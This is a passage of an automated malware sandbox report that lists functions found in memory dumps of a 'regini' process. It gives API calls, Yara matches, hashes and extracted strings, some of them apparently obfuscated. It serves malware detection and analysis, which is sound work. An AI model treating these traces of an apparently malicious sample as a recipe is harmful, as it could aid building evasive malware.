                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInternalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2186235152-0
                                                                                  • Opcode ID: bebc8f0999d7269a19949fd6b9c1aba0b5f34f46f22eebeb4348d9249b14febd
                                                                                  • Instruction ID: f40da24862015a4acb40e81aa1c03c0b0db7467da5669667f87a06133827b104
                                                                                  • Opcode Fuzzy Hash: bebc8f0999d7269a19949fd6b9c1aba0b5f34f46f22eebeb4348d9249b14febd
                                                                                  • Instruction Fuzzy Hash: A101D2B2204108BFCB04DE99DC81EEB77ADAF8C754F118209FA0DE7241D634F8518BA4
                                                                                  Function 00469EB0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00469EF5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: a0a9baeb9889b603c9e2e519a7b7258e35d53077eb86fa72869950bea680f62f
                                                                                  • Instruction ID: de917cc3bc4587376095f21fd7264f3ae0c4d7dab2a56b52980ae6b998fb7e6e
                                                                                  • Opcode Fuzzy Hash: a0a9baeb9889b603c9e2e519a7b7258e35d53077eb86fa72869950bea680f62f
                                                                                  • Instruction Fuzzy Hash: 39F0E57334131436E72075AA9C42FDB769CDB81B65F19042AF70DDB1C1D995B84142AD
                                                                                  Function 00469EAB Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00469EF5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: dea04bd62033553fae845af8bc586f368d4638d44dc6817859a551af279330fd
                                                                                  • Instruction ID: 304ad4053b60cdd1a1c8d5e899ccb75a4f4ff8d806995756cc039a08b93d133b
                                                                                  • Opcode Fuzzy Hash: dea04bd62033553fae845af8bc586f368d4638d44dc6817859a551af279330fd
                                                                                  • Instruction Fuzzy Hash: 43F0657228170436E23075999C12FDB675D8B81B54F19041AF74DDB2C0D899B94242AE
                                                                                  Function 00489A10 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00471BC9,?,?,00471BC9,_XH,?,?,00471BC9,_XH,00001000,?,?,00000000), ref: 00489A4F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 1e5971ee8760370d2dffdb4a0dfdf9e4f37099d36bec83528a813842de99e206
                                                                                  • Instruction ID: 9edb395355ebd07f4c0c6024a6e48b179ea749eb65dee67cda792047ca691d47
                                                                                  • Opcode Fuzzy Hash: 1e5971ee8760370d2dffdb4a0dfdf9e4f37099d36bec83528a813842de99e206
                                                                                  • Instruction Fuzzy Hash: A6E06DB52002047BD714EF59DC41F9B77ACEFC5718F00440AFA09A7241D670B81087B9
                                                                                  Function 00478520 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0047854C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 9981d6d3080af2d211b20b32972f6702045dea654a53f804af784900ab465e3e
                                                                                  • Instruction ID: e341e59039db9319f1551650b800e5b05b4ebb909d5fe7a4642e9492bf7a7ec5
                                                                                  • Opcode Fuzzy Hash: 9981d6d3080af2d211b20b32972f6702045dea654a53f804af784900ab465e3e
                                                                                  • Instruction Fuzzy Hash: F8E0487125020437E72465ACDC45FA733595744724F188955B91DDB2D1D57DE9014154
                                                                                  Function 00478519 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0047854C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 6563bc40edbaef927a270c6dfd1a40ef4791c88912239d6d243178112abb832d
                                                                                  • Instruction ID: 57045b6f3aacbf576316181a7b9aab39883269142ace789e6363981802636252
                                                                                  • Opcode Fuzzy Hash: 6563bc40edbaef927a270c6dfd1a40ef4791c88912239d6d243178112abb832d
                                                                                  • Instruction Fuzzy Hash: 91E0D17114120077E724767CCC46FEB33255B44324F58495DF85DE73C2D53DD9014644
                                                                                  Function 00478310 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00471EC0,0048819F,_XH,00471E83), ref: 00478343
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 363884f9d38d632f0b34ecf267f7e42575e2d3b88f864772670831cc38b0865f
                                                                                  • Instruction ID: daf3d6565eceb97bbb7a7a4259a1192b0c6558a0c91b0c63595b0fd0d32b8fc8
                                                                                  • Opcode Fuzzy Hash: 363884f9d38d632f0b34ecf267f7e42575e2d3b88f864772670831cc38b0865f
                                                                                  • Instruction Fuzzy Hash: 26D05E717803053FF640B6E9CC07F6A328C9B40B54F09806AFE0CE72C2EC59E40146AA
                                                                                  Function 02DB2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 82cb577cee538915e5fcf5625e32fb5726021a5f1710774c92489cb687b0c52f
                                                                                  • Instruction ID: 0b624b3ff8606b0bb1a456525212171cc2439517c064e67ac85d4ed0f9655b42
                                                                                  • Opcode Fuzzy Hash: 82cb577cee538915e5fcf5625e32fb5726021a5f1710774c92489cb687b0c52f
                                                                                  • Instruction Fuzzy Hash: 52B09B729055C5C5DF12E7604A0DB177A006BD0702F25C065D2034761E4739C9D1F175

                                                                                  Non-executed Functions

                                                                                  Function 02BA0525 Relevance: .1, Instructions: 147COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515680340.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2ba0000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c192acda0ee691e79b3116a3cac29308ad097c121535eca2a3fd55bd30c7ec86
                                                                                  • Instruction ID: 1ca4e215448292d40588d654d6546e8490bd843d4b410bab19d97d765e106a27
                                                                                  • Opcode Fuzzy Hash: c192acda0ee691e79b3116a3cac29308ad097c121535eca2a3fd55bd30c7ec86
                                                                                  • Instruction Fuzzy Hash: B941F57191DB0D4FD368EF6C90913BAB3E2FB45314F500A6DC99AC3252EB70E8468685
                                                                                  Function 0046E37A Relevance: .0, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 932f10d6317435ce6400c1e15b69c8dba552fed020ac60519ea3fec0015f989b
                                                                                  • Instruction ID: 32290d2b0d08872d1229ad3bd8dc61ef3058db80cc383b10423f46543bc90c87
                                                                                  • Opcode Fuzzy Hash: 932f10d6317435ce6400c1e15b69c8dba552fed020ac60519ea3fec0015f989b
                                                                                  • Instruction Fuzzy Hash: 7CC09227F55A0803C825880E78922B4F3A9C7C7136E5432A7EC0EF77A05886D8A100EA
                                                                                  Function 02BAE049 Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515680340.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2ba0000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                  • API String ID: 0-3558027158
                                                                                  • Opcode ID: 14c6ef6fe7c2a6a46846bd1952ede5c78e3a402f396c8ebb349362567dbd0881
                                                                                  • Instruction ID: f9e2bcbf535dabf5f5c700a6377235af62ec07a8ea3484ea14a82edc5543fe8e
                                                                                  • Opcode Fuzzy Hash: 14c6ef6fe7c2a6a46846bd1952ede5c78e3a402f396c8ebb349362567dbd0881
                                                                                  • Instruction Fuzzy Hash: AD915EF04083988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                                                  Function 02BA3C5A Relevance: 18.8, Strings: 15, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515680340.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2ba0000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ;hs$!<>6$##?6$52!:$608<$:'|f$:='<$??2|$`d}`$c}ab$db}j$f}cs$|`j}$|f`d$}`e
                                                                                  • API String ID: 0-2596724842
                                                                                  • Opcode ID: c21a6c53848624ab19310d3d276fcf8c02992480dc7912a413f73885f3c63734
                                                                                  • Instruction ID: eab0a337f12573ad23323fa50b813454de872c45b18614ed5b7536d7dcf1432a
                                                                                  • Opcode Fuzzy Hash: c21a6c53848624ab19310d3d276fcf8c02992480dc7912a413f73885f3c63734
                                                                                  • Instruction Fuzzy Hash: 922102B090874CDFCB219F84C651ADEBB71FF15744F819059E8096F390CB76825A8B89
                                                                                  Function 02DB2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 7a827ed9f794db57c58ecd4706a66a39f82b8240c8d4fc81e75c88d29ba7baf1
                                                                                  • Instruction ID: 4d4391b08221df0dbb91add03ed36a3bd60e664e03069036c4d029841e9d1cdb
                                                                                  • Opcode Fuzzy Hash: 7a827ed9f794db57c58ecd4706a66a39f82b8240c8d4fc81e75c88d29ba7baf1
                                                                                  • Instruction Fuzzy Hash: 3651D8B6A00116EFDF11DB5888949BEF7B8BF08700B508269E8AAD7741D334DE44CBE0
                                                                                  Function 02E22410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: e6d9fb2e6a2244abcfa7a2dcf1a93d7d88d6cb952ef0b1fb7c801e65f1a0dbe3
                                                                                  • Instruction ID: c8f2eb597b586735d897f7d55e6ba94963f11143a7e693b8f862f39286aa9881
                                                                                  • Opcode Fuzzy Hash: e6d9fb2e6a2244abcfa7a2dcf1a93d7d88d6cb952ef0b1fb7c801e65f1a0dbe3
                                                                                  • Instruction Fuzzy Hash: 10510471A80665ABDB20CF9CC8909BEB7B9EB44204B04D459EA97C7641EB74DE08CB60
                                                                                  Function 02BA3B14 Relevance: 15.1, Strings: 12, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515680340.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2ba0000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ADNL$CHI$D@LJ$DNLY$HUNE$LCJH$LYDB$L[DK$L]]A$YDBC$YHUY$]ADN
                                                                                  • API String ID: 0-311086289
                                                                                  • Opcode ID: 6e62b8c6f790ad737a6b49497b5e734bf6c555e6bd5404a6d93f4002c434663f
                                                                                  • Instruction ID: 34e579311cab524b5f45b3002b39ca1eab1d14e4910759c4de195aa34db8b1c0
                                                                                  • Opcode Fuzzy Hash: 6e62b8c6f790ad737a6b49497b5e734bf6c555e6bd5404a6d93f4002c434663f
                                                                                  • Instruction Fuzzy Hash: 553104B0A1434CEBCF14DF84D1046DEBBB1FB05348F824059E8296F615C7769A55CB88
                                                                                  Function 02DA7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02DE4655
                                                                                  • Execute=1, xrefs: 02DE4713
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02DE46FC
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 02DE4787
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02DE4725
                                                                                  • ExecuteOptions, xrefs: 02DE46A0
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02DE4742
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: 97c0c1b5c79620cb0543d32c46be95eacad5425426c42974c0a4a41a59d28d8d
                                                                                  • Instruction ID: 2fdd819de320bc85eda1b7933be2301bf9cb9340d3e03ed0800f8f26001da04b
                                                                                  • Opcode Fuzzy Hash: 97c0c1b5c79620cb0543d32c46be95eacad5425426c42974c0a4a41a59d28d8d
                                                                                  • Instruction Fuzzy Hash: E451E7316402596AFF11ABA8DCA5FEEB7B9EF04304F140099D506A7391EB71DE45CFA0
                                                                                  Function 02E46940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction ID: ee695c9d822f13d900e9ae5183529eefb4eb13bf181944a1232efa5c72160343
                                                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction Fuzzy Hash: 95022671548341AFC709DF18D490A6FBBEAEFC9704F04992DF9894B264DB31E905CB92
                                                                                  Function 02DBB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction ID: 9e674b193383a435f2229079432360430e6a98b784cd057ee353bacd58c3293f
                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction Fuzzy Hash: 6E818E74E05249DEDF268E68C8A17EEBBA2AF45318F18415BDC93AB790C7349C40CB61
                                                                                  Function 02E220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$[$]:%u
                                                                                  • API String ID: 48624451-2819853543
                                                                                  • Opcode ID: 5b0c0d7147783336c8aaa390c41aaa848c89ffafbc3444ea05018ec1488a742a
                                                                                  • Instruction ID: 854b5074efc422949a3988a95b4b4dce4e6eee094b76107a7f5694d583108d34
                                                                                  • Opcode Fuzzy Hash: 5b0c0d7147783336c8aaa390c41aaa848c89ffafbc3444ea05018ec1488a742a
                                                                                  • Instruction Fuzzy Hash: 81218176A00129ABDB10DF79DC54EFEBBE9EF44748F04412AEE06E3200E73099058BB0
                                                                                  Function 02D9F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02DE02BD
                                                                                  • RTL: Re-Waiting, xrefs: 02DE031E
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02DE02E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: c5e6fb238a187a4283790187ed94eafd8bde66a8be613d4601295a614ebf1d80
                                                                                  • Instruction ID: 6df724197e3dc11a8081328621912b1bb51fdf12ce980094f9c8e539822c396f
                                                                                  • Opcode Fuzzy Hash: c5e6fb238a187a4283790187ed94eafd8bde66a8be613d4601295a614ebf1d80
                                                                                  • Instruction Fuzzy Hash: BCE1BA306087419FDB25DF28C884B2AB7E1EB84328F144A69F5A6DB7E0D7B5DC44CB52
                                                                                  Function 02DABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 02DE7BAC
                                                                                  • RTL: Resource at %p, xrefs: 02DE7B8E
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02DE7B7F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  • Opcode ID: 01bb3a7e92157ea2c7e1b06363435a689f386878e22106c3cd740096e6573a54
                                                                                  • Instruction ID: 856b5d576b62fbc9df1270be725008b0ee3ccccd955c523789a0b051825db4d1
                                                                                  • Opcode Fuzzy Hash: 01bb3a7e92157ea2c7e1b06363435a689f386878e22106c3cd740096e6573a54
                                                                                  • Instruction Fuzzy Hash: 0541BF317047029FDB20DE258850F6AB7E5EF98714F140A1EE996DB780DB71ED06CB91
                                                                                  Function 02DAB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DE728C
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 02DE72C1
                                                                                  • RTL: Resource at %p, xrefs: 02DE72A3
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02DE7294
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
